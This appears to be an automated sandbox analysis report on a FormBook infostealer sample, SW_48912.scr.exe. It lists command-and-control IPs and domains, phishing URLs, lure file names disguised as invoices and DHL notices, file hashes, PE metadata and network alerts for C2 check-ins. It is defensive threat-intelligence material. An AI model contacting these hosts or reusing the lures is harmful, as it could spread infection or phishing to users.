• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: SW_48912.scr.exe
                                                                                                                  No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.10.26 | wa71myDkbQ.exe | malicious | Unknown |
47.83.1.90 | z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe | malicious | FormBook | www.gayhxi.info/jfb9/
199.59.243.227 | rQuotation.exe | malicious | FormBook | www.sob.rip/w4ic/?4v7=yS69adElfH9iGuX+6qGjDo1pzUaFwG2aAiZ0CSeLQ3WEURd5D9NqWLH4alYcst9SwKAkCKhjPGbctdXA/FIYLK0HEa0UfTU4rNsaCNMRH49YQwEuYtvnEXw=&pRel=chN0
199.59.243.227 | https://tfsroanoke.com/home/tfs/public_html/new/ckfinder/userfiles/files/12719803849.pdf | malicious | PDFPhish | ww25.crewmak.ru/_tr
199.59.243.227 | htkeUc1zJ0.exe | malicious | Unknown | ww7.cutit.org/oxgBR?usid=27&utid=9975975645
199.59.243.227 | DHL.exe | malicious | FormBook | www.969-usedcar02.shop/cfcv/
199.59.243.227 | z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe | malicious | FormBook | www.sorket.tech/ul4e/
199.59.243.227 | 236236236.elf | malicious | Unknown | survey-smiles.com/
199.59.243.227 | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | ww7.przvgke.biz/aikqer?usid=23&utid=8062768193
199.59.243.227 | Payment Copy #190922-001.exe | malicious | FormBook | www.deadshoy.tech/0sq9/
199.59.243.227 | new.exe | malicious | FormBook | www.vavada-official.buzz/emhd/
199.59.243.227 | PO 1202495088.exe | malicious | FormBook | www.sob.rip/tp8k/
85.159.66.93 | DHL 806-232024.exe | malicious | FormBook | www.magmadokum.com/fo8o/
85.159.66.93 | DHL 0737-12182024.exe | malicious | FormBook | www.magmadokum.com/fo8o/
85.159.66.93 | DHL 073412182024.exe | malicious | FormBook | www.magmadokum.com/fo8o/
85.159.66.93 | Nieuwebestellingen10122024.exe | malicious | FormBook | www.restobarbebek.xyz/jm9b/
85.159.66.93 | DHL 40312052024.exe | malicious | FormBook | www.magmadokum.com/fo8o/
85.159.66.93 | DHL 30312052024.exe | malicious | FormBook | www.magmadokum.com/fo8o/
85.159.66.93 | rPaymentAdviceNote_pdf.exe | malicious | FormBook | www.beythome.online/80gy/
85.159.66.93 | SRT68.exe | malicious | FormBook | www.beythome.online/nlsy/
85.159.66.93 | ek8LkB2Cgo.exe | malicious | FormBook | www.soainsaat.xyz/912o/
85.159.66.93 | PO 4110007694.exe | malicious | FormBook | www.soainsaat.xyz/rum2/
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: 94950.bodis.com
Sample/URL: rQuotation.exe | Detection: malicious | Threat: FormBook | Context: 199.59.243.227
Sample/URL: Payment Copy #190922-001.exe | Detection: malicious | Threat: FormBook | Context: 199.59.243.227
Sample/URL: new.exe | Detection: malicious | Threat: FormBook | Context: 199.59.243.227
Sample/URL: PO 1202495088.exe | Detection: malicious | Threat: FormBook | Context: 199.59.243.227
Sample/URL: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Detection: malicious | Threat: FormBook | Context: 199.59.243.227
Sample/URL: SHIPPING DOC.exe | Detection: malicious | Threat: FormBook | Context: 199.59.243.227
Sample/URL: Purchase order MIPO2425110032.exe | Detection: malicious | Threat: FormBook | Context: 199.59.243.227
Sample/URL: PI916810.exe | Detection: malicious | Threat: FormBook | Context: 199.59.243.227
Sample/URL: SALES ORDER875.exe | Detection: malicious | Threat: FormBook | Context: 199.59.243.227
Sample/URL: Invoice & Packing list For Sea Shipment.exe | Detection: malicious | Threat: FormBook | Context: 199.59.243.227

Match: natroredirect.natrocdn.com
Sample/URL: DHL 806-232024.exe | Detection: malicious | Threat: FormBook | Context: 85.159.66.93
Sample/URL: DHL 0737-12182024.exe | Detection: malicious | Threat: FormBook | Context: 85.159.66.93
Sample/URL: DHL 073412182024.exe | Detection: malicious | Threat: FormBook | Context: 85.159.66.93
Sample/URL: new.exe | Detection: malicious | Threat: FormBook | Context: 85.159.66.93
Sample/URL: PO 1202495088.exe | Detection: malicious | Threat: FormBook | Context: 85.159.66.93
Sample/URL: RFQ_P.O.1212024.scr | Detection: malicious | Threat: FormBook | Context: 85.159.66.93
Sample/URL: Nieuwebestellingen10122024.exe | Detection: malicious | Threat: FormBook | Context: 85.159.66.93
Sample/URL: NEW.RFQ00876.pdf.exe | Detection: malicious | Threat: FormBook | Context: 85.159.66.93
Sample/URL: DHL 40312052024.exe | Detection: malicious | Threat: FormBook | Context: 85.159.66.93
Sample/URL: DHL 30312052024.exe | Detection: malicious | Threat: FormBook | Context: 85.159.66.93

Match: www.sorket.tech
Sample/URL: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe | Detection: malicious | Threat: FormBook | Context: 199.59.243.227

Match: www.cruycq.info
Sample/URL: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Detection: malicious | Threat: FormBook | Context: 47.83.1.90
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: CLOUDFLARENETUS
Sample/URL: cMTqzvmx9u.exe | Detection: malicious | Threat: LummaC, Amadey, LummaC Stealer, RedLine | Context: 104.21.67.146
Sample/URL: Technonomic.exe | Detection: malicious | Threat: GuLoader, Snake Keylogger, VIP Keylogger | Context: 172.67.177.134
Sample/URL: fnCae9FQhg.exe | Detection: malicious | Threat: LummaC | Context: 104.21.36.201
Sample/URL: bG89JAQXz2.exe | Detection: malicious | Threat: LummaC | Context: 104.21.36.201
Sample/URL: SFtDA07UDr.exe | Detection: malicious | Threat: LummaC | Context: 104.21.36.201
Sample/URL: https://app.salesforceiq.com/r?target=631f420eed13ca3bcf77c324&t=AFwhZf065tBQQJtb1QfwP5t--0vgBJ0h_ebIEq5KFXSXqUZai5J8FQSwWrq93GQOlAns9KDGvW4ICfvxj8Z5CJD1Q9Wt5o0NW5c0cKHizUAbubpaOgmKjcVLdh1YXO2nIltTeoePggUL&url=https://monaghans.jimdosite.com | Detection: malicious | Threat: HTMLPhisher | Context: 162.159.128.70
Sample/URL: https://office356quilter.krkonqghz.ru/Vt2VD2f3#https://outlookofficecom/mail/deleteditems/id/AAQkADU5#aGVpZGkuZGlsa0BxdWlsdGVyLmNvbQ== | Detection: malicious | Threat: Unknown | Context: 104.21.17.63
Sample/URL: http://au.kirmalk.com/watch.php?vid=7750fd3c8 | Detection: malicious | Threat: Unknown | Context: 172.67.207.202
Sample/URL: eCompleted_419z.pdf | Detection: malicious | Threat: HTMLPhisher | Context: 104.21.112.1
Sample/URL: 3zg6i6Zu1u.exe | Detection: malicious | Threat: LummaC | Context: 172.67.157.254

Match: WEB2OBJECTSUS
Sample/URL: nklmips.elf | Detection: malicious | Threat: Unknown | Context: 142.147.192.186
Sample/URL: 8gJ5wLVFMQ.elf | Detection: malicious | Threat: Mirai | Context: 104.194.198.227
Sample/URL: SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll | Detection: malicious | Threat: CobaltStrike | Context: 45.41.204.204
Sample/URL: h7x9LMic6K.elf | Detection: malicious | Threat: Mirai, Okiru | Context: 142.147.192.152
Sample/URL: Z3eha282zf.elf | Detection: malicious | Threat: Mirai, Moobot | Context: 142.147.232.237
Sample/URL: https://clck.ru/36iBPH | Detection: malicious | Threat: Unknown | Context: 45.41.205.104
Sample/URL: https://www.coatsgolds.com/871rc5m/21748tpd?sub1=177772&sub2=14437210-6546&sub3=8676 | Detection: malicious | Threat: Unknown | Context: 45.41.205.104
Sample/URL: ax4BSyUKd4.exe | Detection: malicious | Threat: AveMaria | Context: 45.41.205.55
Sample/URL: YPvUj6ZtWG.elf | Detection: malicious | Threat: Mirai | Context: 142.147.201.173
Sample/URL: kzDFNFn9W1.elf | Detection: malicious | Threat: Mirai | Context: 142.147.192.145

Match: VODANETInternationalIP-BackboneofVodafoneDE
Sample/URL: armv5l.elf | Detection: malicious | Threat: Unknown | Context: 84.63.234.98
Sample/URL: nklarm.elf | Detection: malicious | Threat: Unknown | Context: 178.6.64.7
Sample/URL: nklspc.elf | Detection: malicious | Threat: Unknown | Context: 47.81.36.206
Sample/URL: splmips.elf | Detection: malicious | Threat: Unknown | Context: 146.60.50.216
Sample/URL: nabppc.elf | Detection: malicious | Threat: Unknown | Context: 47.66.112.158
Sample/URL: nklsh4.elf | Detection: malicious | Threat: Unknown | Context: 109.42.2.208
Sample/URL: nabarm5.elf | Detection: malicious | Threat: Unknown | Context: 92.210.45.211
Sample/URL: sh4.elf | Detection: malicious | Threat: Unknown | Context: 80.226.19.235
Sample/URL: loligang.sh4.elf | Detection: malicious | Threat: Mirai | Context: 77.25.21.10
Sample/URL: loligang.arm7.elf | Detection: malicious | Threat: Mirai | Context: 94.217.14.129

Match: BODIS-NJUS
Sample/URL: rQuotation.exe | Detection: malicious | Threat: FormBook | Context: 199.59.243.227
Sample/URL: https://tfsroanoke.com/home/tfs/public_html/new/ckfinder/userfiles/files/12719803849.pdf | Detection: malicious | Threat: PDFPhish | Context: 199.59.243.205
Sample/URL: Tbconsulting Company Guidelines Employee Handbook.docx | Detection: malicious | Threat: Unknown | Context: 199.59.243.227
Sample/URL: htkeUc1zJ0.exe | Detection: malicious | Threat: Unknown | Context: 199.59.243.227
Sample/URL: DHL.exe | Detection: malicious | Threat: FormBook | Context: 199.59.243.227
Sample/URL: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe | Detection: malicious | Threat: FormBook | Context: 199.59.243.227
Sample/URL: Tbconsulting Company Guidelines Employee Handbook.docx | Detection: malicious | Threat: Unknown | Context: 199.59.243.205
Sample/URL: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Detection: malicious | Threat: MassLogger RAT | Context: 199.59.243.227
Sample/URL: Payment Copy #190922-001.exe | Detection: malicious | Threat: FormBook | Context: 199.59.243.227
Sample/URL: new.exe | Detection: malicious | Threat: FormBook | Context: 199.59.243.227
No context
No context
Process: C:\Users\user\Desktop\SW_48912.scr.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 2232
Entropy (8bit): 5.3743124400426145
Encrypted: false
SSDEEP: 48:LWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZSUyus:LLHyIFKL3IZ2KRH9OugEs
MD5: 6F95BA509ADB3DBC601C4AFAE6396773
SHA1: A5CED5AC0B29CF866ECF5B8AB1B8F1EEB28D65BB
SHA-256: 78B871F91DA23C8C405E7B3EEC7B3EBEE77D71319FB82C03BEA51418CC53AFB3
SHA-512: 664322690898F8809635732762D158FB8AA64A156762E5A996F3462A2E0CE06759562BE02B277FC0774BF2253A046B266FDA9811B8629E6B015C3FAAFEB2278F
Malicious: false
Preview: @...e...................................7.......................P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
                                                                                                                    Process:C:\Windows\SysWOW64\sdchange.exe
                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):114688
                                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                    Malicious:false
                                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                    Entropy (8bit):7.78300708312092
                                                                                                                    TrID:
                                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                                                    File name:SW_48912.scr.exe
                                                                                                                    File size:811'528 bytes
                                                                                                                    MD5:b4c5a379d38312666805d0d33e2801b7
                                                                                                                    SHA1:562aeee42c55410fbc2935cc9879236390ee8944
                                                                                                                    SHA256:77bd5b8fde14dc292c27e9526ee5c4d33b557d936deae82fa7abb3e768a74c3b
                                                                                                                    SHA512:8ad099afa50d7d0425adcf0fa3ddc63a3c6b59cce1f6800f9444c4c75727218c90e2d1986d747fa7eeb320153fee6dee41de78b4f934935c9742e89701404780
                                                                                                                    SSDEEP:12288:tuwWmcF55OHTDP19OsImqDqsL/dSdOjy0gIgfxt3VXP3T3d+0v3hBSzTCoMqSujq:t6FXOP1omGvAky0KxRlbdjfuTE+W
                                                                                                                    TLSH:A405029C2618E803C95527B44A71F2B92B75AEE9B802D3C35FD87DEFB5A6F644C05083
                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b)jg.....................4........... ... ....@.. ....................................@................................
                                                                                                                    Icon Hash:17b3cecece96d26d
                                                                                                                    Entrypoint:0x4c1412
                                                                                                                    Entrypoint Section:.text
                                                                                                                    Digitally signed:true
                                                                                                                    Imagebase:0x400000
                                                                                                                    Subsystem:windows gui
                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                    Time Stamp:0x676A2962 [Tue Dec 24 03:24:18 2024 UTC]
                                                                                                                    TLS Callbacks:
                                                                                                                    CLR (.Net) Version:
                                                                                                                    OS Version Major:4
                                                                                                                    OS Version Minor:0
                                                                                                                    File Version Major:4
                                                                                                                    File Version Minor:0
                                                                                                                    Subsystem Version Major:4
                                                                                                                    Subsystem Version Minor:0
                                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                    Signature Valid:false
                                                                                                                    Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                                                    Error Number:-2146869232
Not Before: 13/11/2018 00:00:00
Not After: 08/11/2021 23:59:59
                                                                                                                    Subject Chain
                                                                                                                    • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                                                    Version:3
                                                                                                                    Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                                                    Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                                                    Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                                                    Serial:7C1118CBBADC95DA3752C46E47A27438
                                                                                                                    Instruction
                                                                                                                    jmp dword ptr [00402000h]
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xc13b8          0x57          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xc2000          0x30d0        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0xc2c00          0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xc6000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0xbf418       0xbf600   053e8cfef5d4a1a90604d72854146f32  False     0.9167517145656434  data       7.785959501296895    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xc2000          0x30d0        0x3200    b6bf34f530ca4616c32867170b4bac49  False     0.9015625           data       7.501197148359348    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xc6000          0xc           0x200     0d7f4a96bf6cb22efd46ad5da84f9123  False     0.044921875         data       0.09800417566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA      Size    Type                                                          Language  Country  ZLIB Complexity
RT_ICON        0xc20e8  0x2ccf  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                      0.965129456891291
RT_GROUP_ICON  0xc4db8  0x14    data                                                                              1.05
RT_VERSION     0xc4dcc  0x304   data                                                                              0.4365284974093264
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                        SID      Signature                                     Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
2024-12-24T11:36:03.324390+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5      1         192.168.2.4  49743        104.21.10.26    80         TCP
2024-12-24T11:36:26.211792+0100  2856318  ETPRO MALWARE FormBook CnC Checkin (POST) M4  1         192.168.2.4  49775        45.41.206.57    80         TCP
2024-12-24T11:36:28.480173+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5      1         192.168.2.4  49781        45.41.206.57    80         TCP
2024-12-24T11:36:43.245455+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5      1         192.168.2.4  49820        199.59.243.227  80         TCP
2024-12-24T11:36:58.016186+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5      1         192.168.2.4  49857        162.0.236.169   80         TCP
2024-12-24T11:37:13.072050+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5      1         192.168.2.4  49896        199.59.243.227  80         TCP
2024-12-24T11:37:27.821198+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5      1         192.168.2.4  49933        199.59.243.227  80         TCP
2024-12-24T11:37:43.688311+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5      1         192.168.2.4  49971        47.83.1.90      80         TCP
2024-12-24T11:37:59.023203+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5      1         192.168.2.4  50012        104.21.80.1     80         TCP
2024-12-24T11:38:14.539915+0100  2050745  ET MALWARE FormBook CnC Checkin (GET) M5      1         192.168.2.4  50041        85.159.66.93    80         TCP
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                                                    Dec 24, 2024 11:37:09.320632935 CET4988880192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:09.443680048 CET8049888199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:09.443691015 CET8049888199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:09.443747997 CET8049888199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:09.443766117 CET8049888199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:09.443824053 CET8049888199.59.243.227192.168.2.4
